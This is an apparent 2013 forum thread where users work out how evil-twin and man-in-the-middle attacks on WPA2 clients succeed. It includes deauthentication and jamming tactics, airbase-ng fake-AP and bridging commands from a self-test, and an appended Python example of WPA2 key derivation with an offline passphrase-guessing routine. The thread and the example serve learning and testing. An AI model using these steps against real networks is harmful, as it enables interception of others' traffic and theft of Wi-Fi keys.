MitM conceptual question


Post by gBarreras93 on Tue Nov 26, 2013 9:09 pm

Hello all,
I've read some Man in the Middle tutorials and demonstrations. I've never done it, though.
As far as I know, it's easy to execute a MitM attack on a client connected to an open network.
The attacker only has to create a honeypot with the same ESSID as the open network the client is connected to. He may need to overlap the original network.
For that purpose, the client has to receive a stronger signal from the fake network than from the original one. Then the client is going to connect to the honeypot and is going to be attacked by a MitM attack.

My question is about WEP/WPA/WPA2. Let's imagine a WPA2 network, which is protected by password authentication.
The attacker has to create a honeypot with the same ESSID and also set the same password as the original network, right?
Otherwise the client, who will try to connect automatically with the stored password, won't be able to connect to the network, because the passwords won't match.
In case the fake network has a different encryption configuration from the original (like WEP or open authentication), the client will not be able to match the original data it remembers with the fake network, even if both have the same ESSID and BSSID.
So, in order to do a MitM attack against a client connected to WEP/WPA/WPA2, you have to crack the password first. Is that correct?

Thaaaank you!


This is my first post, by the way.


Post by WallShadow on Wed Nov 27, 2013 6:52 am

I'll admit that I haven't practiced this stuff in a while, so I don't remember the details perfectly.

However, first: you are describing an evil twin attack, although you can further proceed to make it into a MitM attack if you pull it off properly.

Now, as far as I remember from reading and testing this stuff: NO. Computers (especially wifi adapters) are terribly stupid. You would probably want to set up an open authentication AP because that is the easiest and attracts hosts really well. But what it also does is skip the wifi password/authentication, which you would otherwise have to match exactly with the old access point. Just set up an open auth point with the same name, and it will invite hosts to join just as well as the authenticated one. The one thing you can't do is protect the fake AP with a password or encryption that the victim doesn't know; that would screw it up.

From there you can do a number of things, such as jam the original network to prevent it from catching the host, DoS the real AP to prevent it from connecting the client, de-auth some clients of the real AP to get them to "convert" over to your fake AP, or simply use a honeypot instead of an evil twin to catch the host no matter what ESSID it's scanning for.

<3


Post by gBarreras93 on Wed Nov 27, 2013 3:00 pm

Yes, you're right, it's evil twin.
However, I would say I read in a BackTrack 5 R3 tutorial that wireless interfaces kind of associate (essid, encryption). So they do distinguish between an open and a WPA network even if both have the same ESSID.
I'm not sure, I will check it when I find some time.
Thank you for the response!


Post by TheKrimlin on Sun Dec 01, 2013 4:17 pm

The only problem with doing ET on a secure connection, no matter the pass, is usually people have their connections set to auto connect. The problem lies in that you would have to get their router to shut down and host your twin connection when they're trying to connect.

Another problem: if you boot their router and host yours when they try and connect, most people don't configure their settings and therefore the password to their router is the numbers on their router. The logic is: when my internet goes down I go check the router. Let's say they get booted and you host yours and it pops up with "enter password"; they'll assume "hey, it's ok" and go and check their router for the pass and see it's offline.

It'll be tricky but doable.


Post by WallShadow on Sun Dec 01, 2013 6:32 pm

TheKrimlin wrote:Only problem on doing ET on a secure connection no matter the pass is usually people have their connections set on auto connect. Problem lays in you would have to get their router to shut down and host your twin connection when they're trying to connect.


hence the
WallShadow wrote:jam the original network to prevent it from catching the host, DoS the real AP to prevent it from connecting the client, de-auth some clients of the real AP to get them to "convert" over to your fake ap, or simply use a honeypot instead of an evil twin to catch the host no matter what essid it's scanning for.


TheKrimlin wrote:Lets say they get booted and you host yours and it pops up with the enter password they'll assume hey it's ok and go and check their router for the pass and see its offline.


That's true, but that might signal to a vigilant user that they are being attacked.


Post by TheKrimlin on Mon Dec 02, 2013 12:02 am

That's what I was getting at lol

This just seems like too much work when you could just target their router and capture all the packets to and from, and sift through them.


Post by WallShadow on Mon Dec 02, 2013 4:11 pm

TheKrimlin wrote:This just seems like too much work when you could just target their router and capture all the packets to and from, and sift through them.


How are you going to sift through encrypted packets without the key?


Post by gBarreras93 on Thu Dec 05, 2013 5:46 pm

WallShadow wrote:
TheKrimlin wrote:This just seems like too much work when you could just target their router and capture all the packets to and from, and sift through them.
How are you going to sift through encrypted packets without the key?

I support WallShadow, you cannot do that without having the key.

However, I'm missing something here, or it's simply quite easy.
What I would do is send deauthentication packets to the real AP so every client connected gets disconnected and it's not possible to connect to the real AP.
You've already set up your fake AP (honeypot) with the same ESSID and without any authentication (open network).
If it's true that
WallShadow wrote:now as far as I remember from reading and testing this stuff, NO. computers (especially wifi adapters) are terribly stupid. you would probably want to set up an open authentication AP because that is the easiest and attracts hosts really well. but what it also does is to skip the wifi password/authentication which you would otherwise have to match exactly with the old access point. just set up an open auth point with the same name, and it will invite hosts to join just as well as the authenticated one

Then the client computer is going to connect to your honeypot automatically; maybe the client user is not even realizing that he got disconnected and connected again, or maybe the internet connection is established but the user is not even using the computer.
Nevertheless, I still doubt a wifi manager (could be Windows' or Ubuntu's) is such an idiot as to autoconnect to an open network just because it has the same ESSID as a network it remembered. In my experience, sometimes even when I manually connect to an open network on Windows 7, it prompts me whether I want to connect to an insecure network.

Thank you both for the participation :D

-- Sat Dec 07, 2013 11:21 am --

Yesterday I used BackTrack 5 and my Android phone as the victim.
I tested it with my own WPA2 network.
I used airbase-ng to create a fake open access point in BackTrack with the same name as the honest wireless network.
I used aireplay-ng to send deauthentication packets specifying the MAC of the honest network AP (BSSID) and the MAC of the victim (that is, the MAC of my phone, which can be seen by sniffing packets with airodump-ng, for instance).
WallShadow was right. When the phone receives some deauthentication packets, it automatically tries to connect to the fake open network with the same name.
So far the experiment shows it's possible (and easy) to make an Android phone connect to your fake wireless network.
Maybe Windows, Ubuntu or macOS don't behave this way.

Then I tried to provide the victim an internet connection so I could see all the packets sent. However, the phone couldn't get an IP in the network, so it kept trying for a while and then reconnected to the honest AP if deauth packets were not sent anymore.
I tried to build a bridge between my cable connection interface and the fake AP interface but it didn't work, or I didn't do it well.
I couldn't spend more than an hour so I left.
If you can make this last step work please let me know how.
Regards


Post by limdis on Sat Dec 07, 2013 6:22 pm

I had this huge response half typed out but it seems you have done a lot of research on your own (which is so nice to see). I didn't want to be repeating things you already know. So I have a couple of questions for you instead.

1. Do you know why a MiTM won't work without the target network key?
2. Assuming this is a WPA2 encrypted network, are you unable to get the key?
3. How do you have your fake AP configured, and was it properly set to mimic the target network? (what is the command line you are running)
4. Did you properly bridge your wired interface with assigned IPs?
5. Did you make sure to enable IP forwarding?


Post by gBarreras93 on Sun Dec 08, 2013 9:58 am

limdis wrote:I had this huge response half typed out but it seems you have done a lot of research on your own (which is so nice to see). I didn't want to be repeating things you already know. So I have a couple of questions for you instead.

1. Do you know why a MiTM won't work without the target network key?
2. Assuming this is a WPA2 encrypted network, are you unable to get the key?
3. How do you have your fake AP configured, and was it properly set to mimic the target network? (what is the command line you are running)
4. Did you properly bridge your wired interface with assigned IPs?
5. Did you make sure to enable IP forwarding?


First of all, I want to say I am not trying to spoof any actual target client. From the first two questions I can guess you think I'm trying to spy on someone or something like that. I started this thread to learn and experiment with the real limitations of a MitM attack.
Here are the answers:

1. A MitM attack has nothing to do with the target network key, from my point of view. A WPA2 network protected by a strong key is not easy to crack. And of course, without having the key, any packet sniffing you do is useless because the packets are encrypted with a session key derived from the WPA2 key.
The goal of MitM is to be between the victim and the Internet. Thus, you are able to see or even modify all the information the victim is sending and receiving. In order to achieve that, you are going to create a fake AP and make the victim connect to it.

2. We assume the victim is connected to a WPA2 encrypted network. As I said before, it's not easy to crack. Unless the key is generated from a known pattern (essid, password) included in BackTrack 5, or it's a common dictionary word like "dog", "Miquel"..., it will be unlikely to be cracked with a personal computer.

3, 4, 5. For now, I'm a newbie. It was the first time I tried to set up a fake AP. I followed the BackTrack 5 Penetration Testing manual. This is:
airbase-ng --essid <honest_network_essid> -c <whichever_allowed_channel> mon0   # set fake AP
echo 1 > /proc/sys/net/ipv4/ip_forward                                          # enable IP forwarding
brctl addbr mitm-bridge                                                         # set up bridge
brctl addif mitm-bridge eth0                                                    # add cable interface to bridge
brctl addif mitm-bridge at0                                                     # add fake AP interface to bridge
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up   # I'm not sure I executed this command or not. I probably forgot it, because I didn't have much time so I was in a hurry. That's the reason why it didn't work completely, I think.
# By the way, if anyone knows the command to use a DHCP client to assign the IPs automatically, please let me know

That's all. Again, thank you for the participation and please do not hesitate in making any corrections. I'm here to learn.
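As an added example that is not part of any post in this thread, here is the key derivation gBarreras93 refers to in answers 1 and 2, worked by hand in Python: the PMK from the passphrase and ESSID, the PTK from the PMK plus the four cleartext handshake values, and the EAPOL MIC under the KCK. Every MAC, nonce, EAPOL byte string and passphrase below is constructed for illustration; the only real value is the IEEE 802.11i test vector PMK for passphrase "password" with SSID "IEEE". It shows concretely why a sniffer without the key gets nothing usable out of a WPA2 capture, why a captured handshake is nevertheless enough for an offline dictionary attack when the passphrase is a common word, and, by contrast, that the open evil twin used in the experiment above performs none of this.

```python
"""Why the WPA2 key matters: PMK/PTK derivation and EAPOL MIC, done by hand.

Added example (not code from the thread). The handshake values below
(MACs, nonces, EAPOL bytes, passphrases) are constructed for illustration;
only the "password"/"IEEE" PMK checked in the test is the published
IEEE 802.11i test vector.
"""
import hashlib
import hmac

SSID = "homenet"                                   # constructed ESSID of the honest AP
AP_MAC = bytes.fromhex("001155aa0001")             # constructed BSSID (authenticator address, AA)
STA_MAC = bytes.fromhex("a4c1380102ff")            # constructed victim MAC (supplicant address, SPA)
ANONCE = bytes(range(32))                          # constructed nonce carried in message 1
SNONCE = bytes(range(32, 64))                      # constructed nonce carried in message 2
# Constructed stand-in for EAPOL-Key message 2 with its 16-byte MIC field zeroed.
EAPOL_M2_ZEROED = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 9 + SNONCE + b"\x00" * 48
REAL_PASSPHRASE = "Correct-Horse-42"               # constructed WPA2 passphrase of the honest AP


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (48 bytes for CCMP) = PRF-384(PMK, "Pairwise key expansion",
    Min(AA,SPA) || Max(AA,SPA) || Min(ANonce,SNonce) || Max(ANonce,SNonce)).
    Everything here except the PMK travels in the clear during the 4-way handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    """EAPOL-Key MIC for WPA2-PSK (AKM 00-0F-AC:2): HMAC-SHA1 under the KCK, truncated to 16 bytes."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def mic_for(passphrase: str) -> bytes:
    """MIC the station would put on message 2 if `passphrase` were the network key."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    kck = ptk[:16]            # KCK = first 128 bits, KEK = next 128, TK (the CCMP key) = last 128
    return eapol_mic(kck, EAPOL_M2_ZEROED)


def offline_guess(observed_mic: bytes, candidates):
    """What a handshake cracker does: try each candidate passphrase and compare MICs.
    Returns the matching passphrase, or None when nothing in the list matches."""
    for candidate in candidates:
        if hmac.compare_digest(mic_for(candidate), observed_mic):
            return candidate
    return None


if __name__ == "__main__":
    observed = mic_for(REAL_PASSPHRASE)          # the MIC a sniffer sees in message 2
    print("weak wordlist:", offline_guess(observed, ["dog", "Miquel", "password"]))
    print("wordlist containing the key:", offline_guess(observed, ["dog", REAL_PASSPHRASE]))
```

Two points fall out of this. First, nothing in the handshake reveals the PMK, so a passive capture only yields something if a guess for the passphrase can be tested, at roughly 4096 HMAC-SHA1 rounds per candidate; a wordlist word like "dog" falls in milliseconds, a random passphrase does not. Second, the open evil twin in the experiment above never runs this exchange at all, which is exactly why the Android phone associated without any key: there is no PMK, no PTK, and no encryption on at0, so the bridge is the only remaining piece.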

